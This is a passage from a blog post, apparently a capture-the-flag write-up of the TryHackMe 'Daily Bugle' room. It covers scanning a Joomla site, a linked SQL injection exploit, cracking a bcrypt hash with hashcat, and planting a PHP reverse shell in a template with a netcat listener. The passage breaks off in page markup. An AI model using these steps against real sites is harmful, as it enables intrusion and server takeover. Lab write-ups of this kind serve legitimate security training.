{"id":722,"date":"2020-05-13T18:25:50","date_gmt":"2020-05-13T18:25:50","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=722"},"modified":"2020-05-13T18:25:50","modified_gmt":"2020-05-13T18:25:50","slug":"daily-bugle","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/daily-bugle\/","title":{"rendered":"<center>Daily Bugle<\/center>"},"content":{"rendered":"\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"376\" data-attachment-id=\"634\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/h98yncq-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?fit=863%2C464&amp;ssl=1\" data-orig-size=\"863,464\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"H98yNCQ-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?fit=700%2C376&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?resize=700%2C376&#038;ssl=1\" alt=\"\" class=\"wp-image-634\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?resize=700%2C376&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?resize=300%2C161&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?resize=768%2C413&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/H98yNCQ-1.png?w=863&amp;ssl=1 863w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">TryHackMe Room:<a rel=\"noreferrer noopener\" href=\"https:\/\/tryhackme.com\/room\/dailybugle\" target=\"_blank\"> https:\/\/tryhackme.com\/room\/dailybugle<\/a><br>Difficulty Rated: Hard.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote has-text-align-center is-layout-flow wp-block-quote-is-layout-flow\"><p>Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.<\/p><\/blockquote>\n\n\n\n<p class=\"has-text-align-center\">Firstly let&#8217;s do a quick nmap scan to see what ports are open.<br>nmap -sV -p- -vv IP<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"89\" data-attachment-id=\"696\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-17814944864566518\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.17814944864566518.png?fit=722%2C92&amp;ssl=1\" data-orig-size=\"722,92\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.17814944864566518\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.17814944864566518.png?fit=700%2C89&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.17814944864566518.png?resize=700%2C89&#038;ssl=1\" alt=\"\" class=\"wp-image-696\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.17814944864566518.png?resize=700%2C89&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.17814944864566518.png?resize=300%2C38&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.17814944864566518.png?w=722&amp;ssl=1 722w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">We have three ports open 80 (HTTP), 22 (ssh) and 3306 (MariaDB), since it has an open HTTP port then surely it must have a webpage or even some sort of content.<\/p>\n\n\n\n<p class=\"has-text-align-center\">It looks like we have a Joomla CMS setup, and a post about someone.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"715\" data-attachment-id=\"697\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-3841718084499248\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?fit=853%2C871&amp;ssl=1\" data-orig-size=\"853,871\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.3841718084499248\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?fit=700%2C715&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?resize=700%2C715&#038;ssl=1\" alt=\"\" class=\"wp-image-697\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?resize=700%2C715&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?resize=294%2C300&amp;ssl=1 294w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?resize=768%2C784&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3841718084499248.png?w=853&amp;ssl=1 853w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption><strong>Flag1<\/strong>: &#8220;Access the webserver, who robbed the bank?&#8221; Hopefully, you&#8217;re about to find the answer, as it&#8217;s &#8220;front&#8221; page news!<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Let&#8217;s see what else this website is hiding from us, let&#8217;s get the go buster going!<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/10.10.181.48\/ -t 50 -w directory-list-2.3-medium.txt<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"623\" data-attachment-id=\"698\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-7437910543492435\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7437910543492435.png?fit=736%2C655&amp;ssl=1\" data-orig-size=\"736,655\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.7437910543492435\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7437910543492435.png?fit=700%2C623&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7437910543492435.png?resize=700%2C623&#038;ssl=1\" alt=\"\" class=\"wp-image-698\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7437910543492435.png?resize=700%2C623&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7437910543492435.png?resize=300%2C267&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.7437910543492435.png?w=736&amp;ssl=1 736w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption>It seems Gobuster has found us some excellent results we can use, we have a robots.txt page.<\/figcaption><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"429\" height=\"481\" data-attachment-id=\"699\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-8188864907952977\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8188864907952977.png?fit=429%2C481&amp;ssl=1\" data-orig-size=\"429,481\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.8188864907952977\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8188864907952977.png?fit=429%2C481&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8188864907952977.png?resize=429%2C481&#038;ssl=1\" alt=\"\" class=\"wp-image-699\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8188864907952977.png?w=429&amp;ssl=1 429w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.8188864907952977.png?resize=268%2C300&amp;ssl=1 268w\" sizes=\"auto, (max-width: 429px) 100vw, 429px\" \/><figcaption>The robots.txt page doesn&#8217;t include anything we don&#8217;t already know.<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">The administrator page requires a login, which we don&#8217;t have yet sadly.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"683\" height=\"552\" data-attachment-id=\"700\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-08976622745472218\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.08976622745472218.png?fit=683%2C552&amp;ssl=1\" data-orig-size=\"683,552\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.08976622745472218\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.08976622745472218.png?fit=683%2C552&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.08976622745472218.png?resize=683%2C552&#038;ssl=1\" alt=\"\" class=\"wp-image-700\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.08976622745472218.png?w=683&amp;ssl=1 683w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.08976622745472218.png?resize=300%2C242&amp;ssl=1 300w\" sizes=\"auto, (max-width: 683px) 100vw, 683px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Flag2: &#8220;What is the Joomla version?&#8221; So we need to find what version of Joomla is running here, OWASP has a <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/rezasp\/joomscan\" target=\"_blank\">tool<\/a> which can do just that for us!<\/p>\n\n\n\n<p>perl joomscan.pl -u http:\/\/10.10.181.48\/<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"666\" height=\"642\" data-attachment-id=\"701\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-6521320969827696\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6521320969827696.png?fit=666%2C642&amp;ssl=1\" data-orig-size=\"666,642\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.6521320969827696\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6521320969827696.png?fit=666%2C642&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6521320969827696.png?resize=666%2C642&#038;ssl=1\" alt=\"\" class=\"wp-image-701\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6521320969827696.png?w=666&amp;ssl=1 666w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6521320969827696.png?resize=300%2C289&amp;ssl=1 300w\" sizes=\"auto, (max-width: 666px) 100vw, 666px\" \/><figcaption>And just like that, we have our version of Joomla for <strong>Flag2<\/strong>!<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Flag3: <em>&#8220;Instead of using SQLMap, why not use a python script! What is Jonah&#8217;s cracked password?&#8221;<\/em><\/p>\n\n\n\n<p class=\"has-text-align-center\">Flag 3 is giving us a hint here, we know the version of Joomla, and if we do a quick Google search, we can see that the version has an <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/XiphosResearch\/exploits\/tree\/master\/Joomblah\" target=\"_blank\">exploit<\/a>.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"697\" data-attachment-id=\"702\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-22677653184661795\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?fit=749%2C746&amp;ssl=1\" data-orig-size=\"749,746\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.22677653184661795\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?fit=700%2C697&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?resize=700%2C697&#038;ssl=1\" alt=\"\" class=\"wp-image-702\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?resize=700%2C697&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?resize=300%2C300&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?resize=150%2C150&amp;ssl=1 150w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.22677653184661795.png?w=749&amp;ssl=1 749w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">We found our user, but the password encrypted with Bcrypt &#8220;3200 &#8211; Hashcat&#8221; I guess now it&#8217;s time to crack it, using Hashcat and rockyou.txt.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -D 2 -m 3200 HASHFILE WORDLIST<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"265\" data-attachment-id=\"703\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-5720252469187004\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.5720252469187004.png?fit=721%2C273&amp;ssl=1\" data-orig-size=\"721,273\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.5720252469187004\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.5720252469187004.png?fit=700%2C265&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.5720252469187004.png?resize=700%2C265&#038;ssl=1\" alt=\"\" class=\"wp-image-703\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.5720252469187004.png?resize=700%2C265&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.5720252469187004.png?resize=300%2C114&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.5720252469187004.png?w=721&amp;ssl=1 721w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><figcaption>We have our password and <strong>Flag3<\/strong>! I&#8217;m using a Windows cracking rig due to better driver support. However, Hashcat works on both Windows and Linux, and the commands are the same.<\/figcaption><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Now we can log in into the administrator page, now that we have accessed our next goal to try and get a reverse shell. There are two methods on how we can do this.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"588\" data-attachment-id=\"704\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-15438450992863528\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?fit=945%2C794&amp;ssl=1\" data-orig-size=\"945,794\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.15438450992863528\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?fit=700%2C588&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?resize=700%2C588&#038;ssl=1\" alt=\"\" class=\"wp-image-704\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?resize=700%2C588&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?resize=300%2C252&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?resize=768%2C645&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.15438450992863528.png?w=945&amp;ssl=1 945w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Method one is to upload the shell within the uploader, but first, you must allow .php and other files to be uploaded. System &#8211; Global Configuration &#8211; Media, once edited you can upload your shell file freely (Hopefully?)<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"734\" data-attachment-id=\"705\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-3034850362408068\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3034850362408068.png?fit=735%2C771&amp;ssl=1\" data-orig-size=\"735,771\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.3034850362408068\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3034850362408068.png?fit=700%2C734&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3034850362408068.png?resize=700%2C734&#038;ssl=1\" alt=\"\" class=\"wp-image-705\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3034850362408068.png?resize=700%2C734&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3034850362408068.png?resize=286%2C300&amp;ssl=1 286w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.3034850362408068.png?w=735&amp;ssl=1 735w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Method two is the most common, and that is to edit the theme itself and include your own reverse shell PHP shell and refresh the page to get your shell started. You can gain a copy of the PHP shell <a rel=\"noreferrer noopener\" href=\"http:\/\/pentestmonkey.net\/tools\/php-reverse-shell\/php-reverse-shell-1.0.tar.gz\" target=\"_blank\">here<\/a>. Once you have it downloaded and extracted ensure you change to your IP and your chosen port! (Or it won&#8217;t connect back to anything).<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"382\" height=\"279\" data-attachment-id=\"706\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-6567102467730569\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6567102467730569.png?fit=382%2C279&amp;ssl=1\" data-orig-size=\"382,279\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"0.6567102467730569\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6567102467730569.png?fit=382%2C279&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6567102467730569.png?resize=382%2C279&#038;ssl=1\" alt=\"\" class=\"wp-image-706\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6567102467730569.png?w=382&amp;ssl=1 382w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.6567102467730569.png?resize=300%2C219&amp;ssl=1 300w\" sizes=\"auto, (max-width: 382px) 100vw, 382px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\">Before we upload our shell, we should firstly set up NC on our attacker system.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc -nvlp 1234<\/code><\/pre>\n\n\n\n<p class=\"has-text-align-center\">&#8220;1234&#8221; is the port, ensure you change it to the one you set within your PHP shell, an IP address isn&#8217;t needed as listens to all devices but only on the given port.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"311\" height=\"91\" data-attachment-id=\"707\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/0-49846929291960596\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2020\/05\/0.49846929291960596.png?fit=311%2C91&amp;ssl=1\" data-orig-size=\"311,91\" data-comments-opened=\"1\" 